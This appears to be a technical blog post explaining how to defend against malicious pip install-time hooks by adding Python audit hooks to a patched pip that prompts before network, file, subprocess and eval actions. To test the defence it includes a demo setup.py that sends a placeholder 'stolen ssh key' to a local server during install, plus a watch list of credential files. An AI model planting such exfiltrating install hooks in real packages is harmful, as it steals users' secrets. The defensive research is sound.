Several supply chain attacks, notably in the Python and Javascript ecosystem, exploit install time hooks to perform malicious activity 1 2. Install time hooks allow running arbitray code before or after package installation. Since attacks utilizing install time hooks do not involve developers actually using the package, it makes them an attractive method for attackers. The most common behaviour observed in known supply chain attacks is data exflitration 1 2.. Common targets include ssh keys, passwords, dotfiles, environment variables etc.

A bit about how pip works

Python packages are distributed in two primary formats: wheel .whl and source .tar.gz. Many packages offer both formats, so pip prefers .whl artifacts over .tar.gz unless you specify --no-binary during pip install.

A package contains package metadata such as author, version, name, dependencies etc. There are two primary ways to declare package metadata. pyproject.toml and setup.py. pip prefers pyproject.toml over setup.py as pyproject.toml is considered setup.py’s successor. Poetry, for example, offers both setup.py and pyproject.toml when running poetry build. In this case, pip would prioritize pyproject.toml.

If you’re distributing your package as a wheel, you cannot run install hooks 3. However, if you’re distributing it as a tarball, you can - given that you have a setup.py and not a pyproject.toml. Confusing, right? Don’t worry, just follow along!

Since setup.py is run during building and installation, it permits execution of arbitrary python code. There may be legitimate reasons to conduct network and or file system actions during or post installation, but since this is the most common attack vector, let’s explore how can we reduce the attack surface using audit hooks!

Test Drive

Let’s setup an audit hook to capture socket.connect and socket.getaddrinfo

 1# vim hook.py
 2import sys
 3
 4
 5def hook(event, args):
 6    if event == "socket.getaddrinfo":
 7        print("REQUESTING " + event + " "+ str(args[0])+":"+str(args[1]))
 8    elif event == "socket.connect":
 9        print("REQUESTING " + event + " "+ str(args[1][0])+":"+str(args[1][1]))
10    else:
11        return
12    data = input("y(es) or n(o): ")    
13    if data != "y":
14        sys.exit(1)
15
16sys.addaudithook(hook)
Let’s test it.

# run http sever
$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

1# vim test.py
2import hook
3import requests
4
5r = requests.get("http://0.0.0.0:8000")
Let’s run test.py

$ pip install requests
$ python3 test.py
REQUESTING socket.getaddrinfo 0.0.0.0:8000
y(es) or n(o): y
REQUESTING socket.connect 0.0.0.0:8000
y(es) or n(o): y

Your http server should show:

127.0.0.1 - - [15/Jun/2023 14:33:56] "GET / HTTP/1.1" 200 -

Try writing n and notice that the server reports no requests.

Great! Now let’s introduce this hook into pip. We need to insert the audit hook before we run the package’s setup.py. We also need to modify the audit hook slightly as setup.py is run as a subprocess.

  1# pip/_internal/utils/setuptools_build.py
  2import sys
  3import textwrap
  4from typing import List, Optional, Sequence
  5
  6
  7AUDIT_HOOK = textwrap.dedent("""'''
  8def hook(event, args):
  9    if event == "socket.getaddrinfo":
 10        sys.stdout.write("REQUESTING " + event + " "+ str(args[0])+":"+str(args[1]) + os.linesep)
 11        sys.stdout.flush()
 12    elif event == "socket.connect":
 13        sys.stdout.write("REQUESTING " + event + " "+ str(args[1][0])+":"+str(args[1][1]) + os.linesep)
 14        sys.stdout.flush()
 15        # TODO: filter anything in venv
 16    # we can filter for anything from here
 17    # https://peps.python.org/pep-0578/#suggested-audit-hook-locations
 18    else:
 19        return
 20    data = input()    
 21    if data != "y":
 22        sys.exit(1)
 23
 24sys.addaudithook(hook)
 25'''""")
 26# Shim to wrap setup.py invocation with setuptools
 27# Note that __file__ is handled via two {!r} *and* %r, to ensure that paths on
 28# Windows are correctly handled (it should be "C:\\Users" not "C:\Users").
 29_SETUPTOOLS_SHIM = textwrap.dedent(
 30    """
 31    exec(compile('''
 32    # This is <pip-setuptools-caller> -- a caller that pip uses to run setup.py
 33    #
 34    # - It imports setuptools before invoking setup.py, to enable projects that directly
 35    #   import from `distutils.core` to work with newer packaging standards.
 36    # - It provides a clear error message when setuptools is not installed.
 37    # - It sets `sys.argv[0]` to the underlying `setup.py`, when invoking `setup.py` so
 38    #   setuptools doesn't think the script is `-c`. This avoids the following warning:
 39    #     manifest_maker: standard file '-c' not found".
 40    # - It generates a shim setup.py, for handling setup.cfg-only projects.
 41    import os, sys, tokenize
 42    try:
 43        import setuptools
 44    except ImportError as error:
 45        print(
 46            "ERROR: Can not execute `setup.py` since setuptools is not available in "
 47            "the build environment.",
 48            file=sys.stderr,
 49        )
 50        sys.exit(1)
 51
 52    __file__ = %r
 53    sys.argv[0] = __file__
 54
 55    if os.path.exists(__file__):
 56        filename = __file__
 57        with tokenize.open(__file__) as f:
 58            setup_py_code = f.read()
 59    else:
 60        filename = "<auto-generated setuptools caller>"
 61        setup_py_code = "from setuptools import setup; setup()"
 62    # setup audit hooks here
 63    %s
 64    exec(compile(setup_py_code, filename, "exec"))
 65    ''' % ({!r}, {}), "<pip-setuptools-caller>", "exec"))
 66    """
 67).rstrip()
 68
 69
 70def make_setuptools_shim_args(
 71    setup_py_path: str,
 72    global_options: Optional[Sequence[str]] = None,
 73    no_user_config: bool = False,
 74    unbuffered_output: bool = False,
 75) -> List[str]:
 76    """
 77    Get setuptools command arguments with shim wrapped setup file invocation.
 78
 79    :param setup_py_path: The path to setup.py to be wrapped.
 80    :param global_options: Additional global options.
 81    :param no_user_config: If True, disables personal user configuration.
 82    :param unbuffered_output: If True, adds the unbuffered switch to the
 83     argument list.
 84    """
 85    args = [sys.executable]
 86    if unbuffered_output:
 87        args += ["-u"]
 88    args += ["-c", _SETUPTOOLS_SHIM.format(setup_py_path, AUDIT_HOOK)]
 89    if global_options:
 90        args += global_options
 91    if no_user_config:
 92        args += ["--no-user-cfg"]
 93    return args
 94
 95
 96def make_setuptools_bdist_wheel_args(
 97    setup_py_path: str,
 98    global_options: Sequence[str],
 99    build_options: Sequence[str],
100    destination_dir: str,
101) -> List[str]:
102    # NOTE: Eventually, we'd want to also -S to the flags here, when we're
103    # isolating. Currently, it breaks Python in virtualenvs, because it
104    # relies on site.py to find parts of the standard library outside the
105    # virtualenv.
106    args = make_setuptools_shim_args(
107        setup_py_path, global_options=global_options, unbuffered_output=True
108    )
109    args += ["bdist_wheel", "-d", destination_dir]
110    args += build_options
111    return args
112
113
114def make_setuptools_clean_args(
115    setup_py_path: str,
116    global_options: Sequence[str],
117) -> List[str]:
118    args = make_setuptools_shim_args(
119        setup_py_path, global_options=global_options, unbuffered_output=True
120    )
121    args += ["clean", "--all"]
122    return args
123
124
125def make_setuptools_develop_args(
126    setup_py_path: str,
127    *,
128    global_options: Sequence[str],
129    no_user_config: bool,
130    prefix: Optional[str],
131    home: Optional[str],
132    use_user_site: bool,
133) -> List[str]:
134    assert not (use_user_site and prefix)
135
136    args = make_setuptools_shim_args(
137        setup_py_path,
138        global_options=global_options,
139        no_user_config=no_user_config,
140    )
141
142    args += ["develop", "--no-deps"]
143
144    if prefix:
145        args += ["--prefix", prefix]
146    if home is not None:
147        args += ["--install-dir", home]
148
149    if use_user_site:
150        args += ["--user", "--prefix="]
151
152    return args
153
154
155def make_setuptools_egg_info_args(
156    setup_py_path: str,
157    egg_info_dir: Optional[str],
158    no_user_config: bool,
159) -> List[str]:
160    args = make_setuptools_shim_args(setup_py_path, no_user_config=no_user_config)
161
162    args += ["egg_info"]
163
164    if egg_info_dir:
165        args += ["--egg-base", egg_info_dir]
166
167    return args

Since this code is called in a subprocess, we need to relay the user input (either y or n) from the main process to the subprocess.

  1# pip/_internal/utils/subprocess.py
  2import logging
  3import os
  4import shlex
  5import subprocess
  6from typing import (
  7    TYPE_CHECKING,
  8    Any,
  9    Callable,
 10    Iterable,
 11    List,
 12    Mapping,
 13    Optional,
 14    Union,
 15)
 16
 17from pip._vendor.rich.markup import escape
 18
 19from pip._internal.cli.spinners import SpinnerInterface, open_spinner
 20from pip._internal.exceptions import InstallationSubprocessError
 21from pip._internal.utils.logging import VERBOSE, subprocess_logger
 22from pip._internal.utils.misc import HiddenText
 23
 24if TYPE_CHECKING:
 25    # Literal was introduced in Python 3.8.
 26    #
 27    # TODO: Remove `if TYPE_CHECKING` when dropping support for Python 3.7.
 28    from typing import Literal
 29
 30CommandArgs = List[Union[str, HiddenText]]
 31
 32
 33def make_command(*args: Union[str, HiddenText, CommandArgs]) -> CommandArgs:
 34    """
 35    Create a CommandArgs object.
 36    """
 37    command_args: CommandArgs = []
 38    for arg in args:
 39        # Check for list instead of CommandArgs since CommandArgs is
 40        # only known during type-checking.
 41        if isinstance(arg, list):
 42            command_args.extend(arg)
 43        else:
 44            # Otherwise, arg is str or HiddenText.
 45            command_args.append(arg)
 46
 47    return command_args
 48
 49
 50def format_command_args(args: Union[List[str], CommandArgs]) -> str:
 51    """
 52    Format command arguments for display.
 53    """
 54    # For HiddenText arguments, display the redacted form by calling str().
 55    # Also, we don't apply str() to arguments that aren't HiddenText since
 56    # this can trigger a UnicodeDecodeError in Python 2 if the argument
 57    # has type unicode and includes a non-ascii character.  (The type
 58    # checker doesn't ensure the annotations are correct in all cases.)
 59    return " ".join(
 60        shlex.quote(str(arg)) if isinstance(arg, HiddenText) else shlex.quote(arg)
 61        for arg in args
 62    )
 63
 64
 65def reveal_command_args(args: Union[List[str], CommandArgs]) -> List[str]:
 66    """
 67    Return the arguments in their raw, unredacted form.
 68    """
 69    return [arg.secret if isinstance(arg, HiddenText) else arg for arg in args]
 70
 71
 72def call_subprocess(
 73    cmd: Union[List[str], CommandArgs],
 74    show_stdout: bool = False,
 75    cwd: Optional[str] = None,
 76    on_returncode: 'Literal["raise", "warn", "ignore"]' = "raise",
 77    extra_ok_returncodes: Optional[Iterable[int]] = None,
 78    extra_environ: Optional[Mapping[str, Any]] = None,
 79    unset_environ: Optional[Iterable[str]] = None,
 80    spinner: Optional[SpinnerInterface] = None,
 81    log_failed_cmd: Optional[bool] = True,
 82    stdout_only: Optional[bool] = False,
 83    *,
 84    command_desc: str,
 85) -> str:
 86    """
 87    Args:
 88      show_stdout: if true, use INFO to log the subprocess's stderr and
 89        stdout streams.  Otherwise, use DEBUG.  Defaults to False.
 90      extra_ok_returncodes: an iterable of integer return codes that are
 91        acceptable, in addition to 0. Defaults to None, which means [].
 92      unset_environ: an iterable of environment variable names to unset
 93        prior to calling subprocess.Popen().
 94      log_failed_cmd: if false, failed commands are not logged, only raised.
 95      stdout_only: if true, return only stdout, else return both. When true,
 96        logging of both stdout and stderr occurs when the subprocess has
 97        terminated, else logging occurs as subprocess output is produced.
 98    """
 99    if extra_ok_returncodes is None:
100        extra_ok_returncodes = []
101    if unset_environ is None:
102        unset_environ = []
103    # Most places in pip use show_stdout=False. What this means is--
104    #
105    # - We connect the child's output (combined stderr and stdout) to a
106    #   single pipe, which we read.
107    # - We log this output to stderr at DEBUG level as it is received.
108    # - If DEBUG logging isn't enabled (e.g. if --verbose logging wasn't
109    #   requested), then we show a spinner so the user can still see the
110    #   subprocess is in progress.
111    # - If the subprocess exits with an error, we log the output to stderr
112    #   at ERROR level if it hasn't already been displayed to the console
113    #   (e.g. if --verbose logging wasn't enabled).  This way we don't log
114    #   the output to the console twice.
115    #
116    # If show_stdout=True, then the above is still done, but with DEBUG
117    # replaced by INFO.
118    if show_stdout:
119        # Then log the subprocess output at INFO level.
120        log_subprocess: Callable[..., None] = subprocess_logger.info
121        used_level = logging.INFO
122    else:
123        # Then log the subprocess output using VERBOSE.  This also ensures
124        # it will be logged to the log file (aka user_log), if enabled.
125        log_subprocess = subprocess_logger.verbose
126        used_level = VERBOSE
127
128    # Whether the subprocess will be visible in the console.
129    showing_subprocess = subprocess_logger.getEffectiveLevel() <= used_level
130
131    # Only use the spinner if we're not showing the subprocess output
132    # and we have a spinner.
133    use_spinner = not showing_subprocess and spinner is not None
134
135    log_subprocess("Running command %s", command_desc)
136    env = os.environ.copy()
137    if extra_environ:
138        env.update(extra_environ)
139    for name in unset_environ:
140        env.pop(name, None)
141    try:
142        proc = subprocess.Popen(
143            # Convert HiddenText objects to the underlying str.
144            reveal_command_args(cmd),
145            stdin=subprocess.PIPE,
146            stdout=subprocess.PIPE,
147            stderr=subprocess.STDOUT if not stdout_only else subprocess.PIPE,
148            cwd=cwd,
149            env=env,
150            errors="backslashreplace",
151        )
152    except Exception as exc:
153        if log_failed_cmd:
154            subprocess_logger.critical(
155                "Error %s while executing command %s",
156                exc,
157                command_desc,
158            )
159        raise
160    all_output = []
161    if not stdout_only:
162        assert proc.stdout
163        assert proc.stdin
164        # In this mode, stdout and stderr are in the same pipe.
165        while True:
166            line: str = proc.stdout.readline()
167            if not line:
168                break
169            if 'REQUESTING' in line:
170                line_without_newline = line.replace('\n', '')
171                proc.stdout.flush()
172                data = input(f'Package is {line_without_newline}. (y)es or (n)o\n')
173                proc.stdin.write(data+'\n')
174                proc.stdin.flush()
175            else:
176                # Show the line immediately.
177                log_subprocess(line)
178            line = line.rstrip()
179            all_output.append(line + "\n")
180
181        try:
182            proc.wait()
183        finally:
184            if proc.stdout:
185                proc.stdout.close()
186            proc.stdin.close()
187        output = "".join(all_output)
188    else:
189        # In this mode, stdout and stderr are in different pipes.
190        # We must use communicate() which is the only safe way to read both.
191        out, err = proc.communicate()
192        # log line by line to preserve pip log indenting
193        for out_line in out.splitlines():
194            log_subprocess(out_line)
195        all_output.append(out)
196        for err_line in err.splitlines():
197            log_subprocess(err_line)
198        all_output.append(err)
199        output = out
200
201    proc_had_error = proc.returncode and proc.returncode not in extra_ok_returncodes
202    if use_spinner:
203        assert spinner
204        if proc_had_error:
205            spinner.finish("error")
206        else:
207            spinner.finish("done")
208    if proc_had_error:
209        if on_returncode == "raise":
210            error = InstallationSubprocessError(
211                command_description=command_desc,
212                exit_code=proc.returncode,
213                output_lines=all_output if not showing_subprocess else None,
214            )
215            if log_failed_cmd:
216                subprocess_logger.error("[present-rich] %s", error)
217                subprocess_logger.verbose(
218                    "[bold magenta]full command[/]: [blue]%s[/]",
219                    escape(format_command_args(cmd)),
220                    extra={"markup": True},
221                )
222                subprocess_logger.verbose(
223                    "[bold magenta]cwd[/]: %s",
224                    escape(cwd or "[inherit]"),
225                    extra={"markup": True},
226                )
227
228            raise error
229        elif on_returncode == "warn":
230            subprocess_logger.warning(
231                'Command "%s" had error code %s in %s',
232                command_desc,
233                proc.returncode,
234                cwd,
235            )
236        elif on_returncode == "ignore":
237            pass
238        else:
239            raise ValueError(f"Invalid value: on_returncode={on_returncode!r}")
240    return output
241
242
243def runner_with_spinner_message(message: str) -> Callable[..., None]:
244    """Provide a subprocess_runner that shows a spinner message.
245
246    Intended for use with for BuildBackendHookCaller. Thus, the runner has
247    an API that matches what's expected by BuildBackendHookCaller.subprocess_runner.
248    """
249
250    def runner(
251        cmd: List[str],
252        cwd: Optional[str] = None,
253        extra_environ: Optional[Mapping[str, Any]] = None,
254    ) -> None:
255        with open_spinner(message) as spinner:
256            call_subprocess(
257                cmd,
258                command_desc=message,
259                cwd=cwd,
260                extra_environ=extra_environ,
261                spinner=spinner,
262            )
263
264    return runner
And that’s it! It should prompt you everytime a socket connection is attempted during installation.

Testing our hook:

Let’s create a fake package to test it out:

$ mkdir test
$ vim test/setup.py
# test/setup.py
from setuptools import setup
import requests # you can use socket too
requests.get('http://0.0.0.0:8000/?key=your_stolen_ssh_key')
setup()
$ tar -czf test.tar.gz test
$ pip install test.tar.gz
Processing ./test.tar.gz
  Preparing metadata (setup.py) ...
Package is REQUESTING socket.getaddrinfo 0.0.0.0:8000. (y)es or (n)o

Another method:

$ vim test/setup.py
# test/setup.py
from setuptools import setup
from setuptools.command.install import install
from setuptools.command.develop import develop
import requests # you can use socket too


class AfterInstall(install):
    def run(self):
        install.run(self)
        requests.get('http://0.0.0.0:8000/?key=your_stolen_ssh_key')


class AfterDevelop(develop):
    def run(self):
        develop.run(self)
        requests.get('http://0.0.0.0:8000/?key=your_stolen_ssh_key')


setup(cmdclass={
            'install': AfterInstall,
            'develop': AfterDevelop})
$ tar -czf test.tar.gz test
$ pip install test.tar.gz
Processing ./test.tar.gz
  Preparing metadata (setup.py) ...
done
Building wheels for collected packages: UNKNOWN
  Building wheel for UNKNOWN (setup.py)
 ... Package is REQUESTING socket.getaddrinfo 0.0.0.0:8000. (y)es or (n)o

Yes! It works!

Additional checks:

 1def hook(event, args):
 2    if event == "socket.getaddrinfo":
 3        sys.stdout.write("REQUESTING " + event + " "+ str(args[0])+":"+str(args[1]) + os.linesep)
 4        sys.stdout.flush()
 5    elif event == "socket.connect":
 6        sys.stdout.write("REQUESTING " + event + " "+ str(args[1][0])+":"+str(args[1][1]) + os.linesep)
 7        sys.stdout.flush()
 8    elif event == "open":
 9        arg = str(args[0])
10        if ".ssh" in arg or "shadow" in arg or "passwd" in arg or ".config" in arg or '.env' in arg:
11          sys.stdout.write("REQUESTING "+ event +" "+ arg + os.linesep)
12          sys.stdout.flush()
13        else:
14          return
15    elif event == "os.system":
16        sys.stdout.write("REQUESTING: " + event+ " " + args[0].decode('utf-8') + os.linesep)
17        sys.stdout.flush()
18    elif event == "subprocess.call":
19        sys.stdout.write("REQUESTING: " + event+ " " + str(args[0]) + os.linesep)
20        sys.stdout.flush()
21    elif event == "subprocess.run":
22        sys.stdout.write("REQUESTING: " + event+ " " + str(args[0]) + os.linesep)
23        sys.stdout.flush()
24    elif event == "eval":
25        sys.stdout.write("REQUESTING: execution of arbitrary code" + os.linesep)
26        sys.stdout.flush()
27    else:
28        return
29    data = input()    
30    if data != "y":
31        sys.exit(1)
Note: It’s easier to set a blacklist than a whitelist for open as pip opens various files when building and installing.

Conclusion:

Audit hooks are NOT foolproof and can be bypassed by an advanced adversary. See the PEP for more info. Despite that, this implementation provides a simple and effective defence against the abuse of install time hooks.

See the full implementation

Use it:

$ python3 -m venv venv
$ cd venv/lib/python3.<yourversion>/site-packages/
$ mv pip old_pip
$ wget https://github.com/R9295/pip/archive/refs/heads/main.zip
$ unzip main.zip
$ mv pip-main pip
$ cd pip
$ mv src/pip/* .
$ cd /to/our/test/package
$ pip install test.tar.gz
# it should work!

  1. Ohm et al. Backstabber’s Knife Collection: A Review of Open Source Software Supply Chain Attacks ↩︎ ↩︎

  2. Duan et al. Towards Measuring Supply Chain Attacks on Package Managers for Interpreted Languages ↩︎ ↩︎

  3. https://stackoverflow.com/questions/24263774/post-install-script-after-installing-a-wheel ↩︎